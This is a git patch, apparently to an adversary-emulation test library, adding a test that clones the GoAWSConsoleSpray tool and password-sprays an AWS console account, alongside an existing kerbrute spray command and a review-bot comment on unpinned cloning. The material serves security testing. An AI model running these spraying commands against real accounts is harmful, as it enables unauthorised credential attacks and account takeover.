From dfd1f668affa95656225afd9cc895a9872324c56 Mon Sep 17 00:00:00 2001
From: patel-bhavin
Date: Wed, 19 Oct 2022 16:16:08 -0700
Subject: [PATCH] adding atomic
---
 atomics/T1110.003/T1110.003.yaml | 29 ++++++++++++++++++++++++-
 atomics/T1110.003/src/aws_passwords.txt | 2 ++
 atomics/T1110.003/src/aws_users.txt | 2 ++
 3 files changed, 32 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1110.003/src/aws_passwords.txt
 create mode 100644 atomics/T1110.003/src/aws_users.txt
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 1105ec2b..96571458 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -288,4 +288,31 @@ atomic_tests:
 command: |
 cd $env:temp
 .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt password132
-
+- name: AWS - Password Spray an AWS using GoAWSConsoleSpray
+ auto_generated_guid: 9c10d16b-20b1-403a-8e67-50ef7117ed4e
+ description: |
+ GoAWSConsoleSpray is a tool that can be used to spray AWS IAM Console Credentials in order to identify a valid login for a user account built by WhiteOakSecurity. For more details reagrding the tool, check - https://www.whiteoaksecurity.com/blog/goawsconsolespray-password-spraying-tool/
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ aws_account_id:
+ description: ID of the AWS account
+ type: String
+ default: "XXXXXXXX"
+ dependencies:
+ - description: |
+ Check if go is installed
+ prereq_command: |
+ go version
+ get_prereq_command: |
+ echo Install GO
+ executor:
+ command: |
+ cd /tmp
+ git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
+ cd /tmp/GoAWSConsoleSpray
+ go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
+ cleanup_command: |
+ rm -rf /tmp/GoAWSConsoleSpray
+ name: sh
+ elevation_required: false
\ No newline at end of file
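Review bot: The executor's `git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git` followed by `go run main.go` builds and runs whatever is on the third-party repository's default branch at test time, so the atomic is neither reproducible nor protected against an upstream change or compromise. Pin the checkout to a reviewed commit and use the HTTPS URL, since the SSH form fails on any host without a GitHub key, e.g. `git clone https://github.com/WhiteOakSecurity/GoAWSConsoleSpray.git /tmp/GoAWSConsoleSpray && git -C /tmp/GoAWSConsoleSpray checkout <PINNED_COMMIT_SHA>`. The commands are also not chained, so if the clone fails or `/tmp/GoAWSConsoleSpray` already exists, the later `cd` and `go run main.go` still run against whatever is in that directory; moving the clone into `dependencies` with a `git` prereq check would make that failure visible. The extra `GoAWSConsoleSpray` argument after `main.go` looks like a leftover from the compiled-binary invocation and is worth confirming against the tool's usage.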
diff --git a/atomics/T1110.003/src/aws_passwords.txt b/atomics/T1110.003/src/aws_passwords.txt
new file mode 100644
index 00000000..3bab5cc5
--- /dev/null
+++ b/atomics/T1110.003/src/aws_passwords.txt
@@ -0,0 +1,2 @@
+password
+password2
\ No newline at end of file
diff --git a/atomics/T1110.003/src/aws_users.txt b/atomics/T1110.003/src/aws_users.txt
new file mode 100644
index 00000000..afa06df2
--- /dev/null
+++ b/atomics/T1110.003/src/aws_users.txt
@@ -0,0 +1,2 @@
+user1
+user2
\ No newline at end of file